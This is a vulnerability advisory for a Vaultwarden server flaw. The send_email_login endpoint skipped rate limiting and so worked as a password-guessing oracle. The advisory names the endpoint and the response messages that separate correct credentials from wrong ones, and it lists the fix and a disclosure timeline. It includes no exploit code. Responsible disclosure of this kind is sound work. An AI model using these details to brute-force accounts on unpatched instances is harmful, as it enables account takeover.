CVE-2026-43914 ‒ Brute-Force Protection Bypass in Vaultwarden via Email 2FA Endpoint

Authored by:
Metrics: cve.org

Description

Vaultwarden is a Bitwarden-compatible server written in Rust. In versions prior to 1.35.4, the login brute-force protection can be bypassed when email 2FA is enabled on the instance. The unprotected send_email_login endpoint acts as an oracle for valid username-password combinations, allowing an attacker to brute-force passwords without rate-limiting. This affects all users on the instance, even those who have not configured email 2FA themselves.

Vulnerability

Vaultwarden implements the check_limit_login function to rate-limit failed login attempts. This protection is applied to _sso_login, _password_login and _api_key_login.

However, when email 2FA is enabled on the instance, the unprotected send_email_login function in email.rs (API endpoint /api/two-factor/send-email-login) also validates the username-password combination and therefore acts as an oracle. Because check_limit_login is not called from this endpoint, an attacker can abuse it to brute-force passwords without ever hitting the rate limiter. This works against every user on the instance, including users who have not configured email 2FA themselves.

The endpoint’s response distinguishes between credential states:

  • If the username-password combination is correct, the endpoint returns HTTP 200 (and sends a 2FA code via email to the victim) or returns the message Two factor not found.
  • If the username-password combination is wrong, it returns Username or password is incorrect.

This behavioural difference allows to perform a password brute-force attack against any account on the instance.

PoC

A small Python PoC that iterates a wordlist and reports valid credentials using the default pbkdf2-sha256 with 600,000 iterations was provided to the vendor. A more robust PoC would query /identity/accounts/prelogin per target user to dynamically retrieve the KDF type and iteration count.

Mitigations

Update to Vaultwarden version 1.35.4 or later. The fix adds the check_limit_login call to send_email_login so that the endpoint is subject to the same rate-limiting as the regular login endpoints.

Timeline

DateAction
15.02.2026Vulnerability reported to security@vaultwarden.org
16.02.2026Vaultwarden acknowledged the report
23.02.2026Fix merged via PR #6867
25.04.2026Vaultwarden published GitHub security advisory GHSA-c5rv-q295-7w4g
11.05.2026CVE-2026-43914 was published
20.05.2026Release of this advisory

References

Share: